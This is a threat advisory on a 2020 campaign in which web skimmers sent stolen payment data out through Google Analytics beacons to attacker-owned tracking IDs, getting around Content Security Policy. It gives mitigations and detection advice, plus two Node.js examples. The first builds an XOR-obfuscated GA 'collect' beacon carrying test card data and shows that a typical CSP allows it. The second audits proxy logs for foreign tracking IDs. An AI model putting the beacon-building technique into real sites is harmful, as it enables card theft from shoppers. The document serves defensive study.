Google Analytics Being Used to Bypass Web Security
I. Targeted Industries
- E-commerce sites
- Higher Education
- Local Government
On June 17, 2020, researchers from several security companies, including PerimeterX, Sansec, and Kaspersky, reported a weakness in how Content Security Policy (CSP), a browser control widely relied on to block credit card skimming, is commonly deployed. CSP offers no protection against this campaign on websites that also deploy Google Analytics (GA): e-commerce sites that use GA to track visitors allow-list the Google Analytics domains in their CSP configurations, and a skimmer can exfiltrate stolen data through those same allow-listed domains. Sansec's research team also found that threat actors in this campaign hosted their skimmer scripts on Google servers so that the traffic would not be flagged as suspicious.
III. Background Information
Content Security Policy (CSP) is a browser security mechanism that helps detect and mitigate cross-site scripting and related injection attacks. A site's policy lists the trusted origins from which scripts may be loaded and to which requests may be sent, so scripts and data traffic to untrusted domains are blocked. Attackers have taken advantage of this because the Google Analytics domains are allow-listed in the policies of many sites, so traffic to them is never blocked.
The Google Analytics platform is a service used to track visitors and traffic on websites. Attackers have been injecting web skimmer scripts into compromised sites that collect and encode the data visitors enter into forms. A small piece of JavaScript then transfers the collected data, such as payment card details and credentials, as a GA event and other Google Analytics parameters. Attackers add their own Tag ID (in the form UA-#######-#) so that the information is delivered to their Google Analytics account rather than the site's. Before sending, the data is obfuscated with an XOR key; once it appears in their GA dashboard, they apply the same key to recover the plaintext (XOR with a static key is obfuscation, not encryption, but it is enough to keep card numbers from being obvious in the beacon). The skimmer scripts themselves are hosted on trusted Google servers at firebasestorage.googleapis.com, which makes the campaign harder to spot. The skimmer also checks whether the browser's developer mode is enabled and only runs when it is not, to stay covert.
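The following is an added example, not code from the advisory or from the skimmer it describes. It simulates the mechanism above in Node.js: form data is XOR-obfuscated, base64-encoded and placed in the event label of a Google Analytics Measurement Protocol "collect" hit addressed to an attacker-owned tracking ID, and a small CSP evaluator shows that a typical store policy allow-listing www.google-analytics.com permits the request. The tracking ID, XOR key, page origin and card data are constructed for the demonstration.

```javascript
// Added example (not code from the advisory or from the skimmer it describes):
// a simulation of how stolen form data is smuggled out in a Google Analytics
// "collect" beacon and why a CSP that allow-lists google-analytics.com lets it
// through. The tracking ID, XOR key, page origin and card data are constructed.

const GA_COLLECT = "https://www.google-analytics.com/collect";
const ATTACKER_TID = "UA-0000000-0";        // hypothetical attacker-owned GA property
const XOR_KEY = "k3y";                      // hypothetical static obfuscation key
const PAGE_ORIGIN = "https://shop.example"; // hypothetical compromised store

// XOR each byte with the repeating key. This is obfuscation, not encryption:
// anyone holding the beacon and the key recovers the data.
function xorBytes(buf, key) {
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) {
    out[i] = buf[i] ^ key.charCodeAt(i % key.length);
  }
  return out;
}
// base64 so the obfuscated bytes survive as a URL query parameter.
function xorEncode(text, key) {
  return xorBytes(Buffer.from(text, "utf8"), key).toString("base64");
}
function xorDecode(b64, key) {
  return xorBytes(Buffer.from(b64, "base64"), key).toString("utf8");
}

// Build a Measurement Protocol v1 event hit (v, tid, t, ec, ea, el) whose event
// label carries the encoded form data, addressed to the attacker's tracking ID.
function buildBeacon(fields, tid, key) {
  const url = new URL(GA_COLLECT);
  url.searchParams.set("v", "1");
  url.searchParams.set("tid", tid);
  url.searchParams.set("t", "event");
  url.searchParams.set("ec", "checkout");
  url.searchParams.set("ea", "submit");
  url.searchParams.set("el", xorEncode(JSON.stringify(fields), key));
  return url.toString();
}

// Recover the form data from a beacon URL, as the attacker does from the GA dashboard.
function decodeBeacon(beaconUrl, key) {
  const label = new URL(beaconUrl).searchParams.get("el");
  return JSON.parse(xorDecode(label, key));
}

// Simplified CSP evaluator: does `policy` allow a request to `requestUrl` under
// `directive`, falling back to default-src? Handles 'self', '*' and plain
// scheme/host source expressions; no wildcard hosts, nonces or hashes.
function cspAllows(policy, directive, requestUrl, pageOrigin) {
  const directives = {};
  for (const part of policy.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) directives[name] = sources;
  }
  const sources = directives[directive] || directives["default-src"] || [];
  const target = new URL(requestUrl);
  return sources.some((src) => {
    if (src === "*") return true;
    if (src === "'self'") return new URL(pageOrigin).origin === target.origin;
    if (src.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces, hashes
    const { protocol, hostname } = new URL(src.includes("://") ? src : "https://" + src);
    return protocol === target.protocol && hostname === target.hostname;
  });
}

// Typical policy of a store that uses GA: script loads and XHR/beacons to GA are allowed.
const STORE_POLICY =
  "default-src 'self'; script-src 'self' https://www.google-analytics.com; " +
  "connect-src 'self' https://www.google-analytics.com";

function runDemo() {
  const stolen = { card: "4111111111111111", exp: "12/26", cvv: "123" }; // constructed test data
  const beacon = buildBeacon(stolen, ATTACKER_TID, XOR_KEY);
  return {
    beacon,
    allowedByCsp: cspAllows(STORE_POLICY, "connect-src", beacon, PAGE_ORIGIN),
    recovered: decodeBeacon(beacon, XOR_KEY),
  };
}

console.log(runDemo());
```

The point the evaluator makes is that nothing in a host-based CSP source expression distinguishes the store's own GA property from the attacker's: both beacons go to the same scheme and host, so the policy decision is identical for both. The only differences visible to the site are the `tid` value and the unusually large event parameters.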
- T1041 – Exfiltration Over Command and Control Channel
Data exfiltration is performed over the command and control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications. In this campaign the channel is the Google Analytics collect endpoint that the site's own analytics traffic already uses, with the stolen data carried in event parameters.
- T1119 – Automated Collection
Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include the use of scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.
- Use adaptive URLs that include the tracking ID as part of the URL
Experts believe this could "allow admins to set CSP rules that restrict data exfiltration to other accounts", since a host-only allow-list cannot tell the site's GA property apart from an attacker's.
- Use XHR proxy enforcement
XHR proxy enforcement could apply rules to the type of data leaving the page and block sensitive fields such as usernames or passwords from being transferred.
- Vulnerability Monitoring
Stay up to date and informed as Google works on a resolution to this issue in its analytics platform.
- Monitor bank and account information
Monitor your bank and account information for signs of compromise.
- Incorporate Known IOCs into IDS
Incorporate the known IOCs of the attack into your intrusion detection system (IDS) to catch suspicious behavior related to the attack. Because the skimmer sends data to the attacker's own Tag ID, outbound Google Analytics collect requests carrying a tracking ID other than the site's own are a reliable signal, as are script loads from firebasestorage.googleapis.com that the site did not deploy.
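As an added example of the IDS/egress check described above (not part of the original advisory), the Node.js script below audits constructed egress-proxy log lines for the tells of this campaign: Google Analytics collect beacons addressed to a tracking ID the site does not own, oversized event parameters, and asset fetches from firebasestorage.googleapis.com. The log lines, the site's tracking ID, the host list and the size threshold are all assumptions made for the demonstration.

```javascript
// Added example, not from the advisory: audit outbound requests recorded by an
// egress proxy for the signals of the GA skimming campaign. Log format, the
// site's own tracking ID and the size threshold are constructed assumptions.

const KNOWN_TIDS = new Set(["UA-1234567-1"]); // hypothetical: the site's own GA property
const GA_HOSTS = new Set([
  "www.google-analytics.com",
  "google-analytics.com",
  "ssl.google-analytics.com",
]);
const MAX_PARAM_LEN = 256; // event labels longer than this are unusual for real analytics

// Constructed sample log: "<timestamp> <method> <url>" per line.
const SAMPLE_LOG = [
  "2020-06-20T10:01:02Z GET https://www.google-analytics.com/collect?v=1&tid=UA-1234567-1&t=pageview&dp=%2Fcheckout",
  "2020-06-20T10:01:03Z GET https://shop.example/api/cart",
  "2020-06-20T10:01:05Z GET https://www.google-analytics.com/collect?v=1&tid=UA-0000000-0&t=event&ec=checkout&ea=submit&el=" + "A".repeat(400),
  "2020-06-20T10:01:06Z GET https://firebasestorage.googleapis.com/v0/b/example.appspot.com/o/analytics.js?alt=media",
  "2020-06-20T10:01:07Z POST https://www.google-analytics.com/collect?v=1&tid=UA-1234567-1&t=event&ec=ui&ea=click",
];

function parseLine(line) {
  const [ts, method, rawUrl] = line.split(" ");
  return { ts, method, url: new URL(rawUrl) };
}

// Return the findings for one log line; an empty array means nothing suspicious.
function auditLine(line, knownTids = KNOWN_TIDS) {
  const { ts, url } = parseLine(line);
  const findings = [];
  if (GA_HOSTS.has(url.hostname) && url.pathname.endsWith("/collect")) {
    const tid = url.searchParams.get("tid");
    if (tid && !knownTids.has(tid)) findings.push(`unknown GA tracking ID ${tid}`);
    for (const [k, v] of url.searchParams) {
      if (v.length > MAX_PARAM_LEN) findings.push(`oversized parameter ${k} (${v.length} chars)`);
    }
  }
  // Review signal rather than a block: the site may legitimately use Firebase storage.
  if (url.hostname === "firebasestorage.googleapis.com") {
    findings.push("asset fetched from firebasestorage.googleapis.com");
  }
  return { ts, url: url.href, findings };
}

// Audit a whole log and keep only the lines that produced findings.
function auditLog(lines, knownTids = KNOWN_TIDS) {
  return lines.map((l) => auditLine(l, knownTids)).filter((r) => r.findings.length > 0);
}

console.log(JSON.stringify(auditLog(SAMPLE_LOG), null, 2));
```

Running it flags two of the five lines: the beacon addressed to `UA-0000000-0` (for both the foreign tracking ID and its 400-character `el` parameter) and the script fetch from firebasestorage.googleapis.com. The same logic can run on a CSP `report-uri` collector or a browser-side fetch wrapper instead of a proxy log, since the inputs are just the request URLs.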
VI. Indicators of Compromise (IOCs)
The link below has been included to assist with the download of identified IOCs related to this Threat Advisory Report. Be on the lookout for these IOCs, as well as anything that looks similar.
(1) Asif, Sudais. "Attackers Steal Payment Information through Google Analytics." HackRead, June 23, 2020. https://www.hackread.com/attackers-steal-payment-data-google-analytics/
(2) Gatlan, Sergiu. "Hackers use Google Analytics to steal credit cards, bypass CSP." BleepingComputer, July 2, 2020. https://www.bleepingcomputer.com/news/security/hackers-use-google-analytics-to-steal-credit-cards-bypass-csp/
(3) Lakshmanan, Ravie. "Hackers Using Google Analytics to Bypass Web Security and Steal Credit Cards." The Hacker News, July 2, 2020. https://thehackernews.com/2020/06/google-analytics-hacking.html
(4) "Save Your Credit Card Details From Getting Stolen Via Google Analytics!" Cyware, July 7, 2020. https://cyware.com/news/save-your-credit-card-details-from-getting-stolen-via-google-analytics-209bce67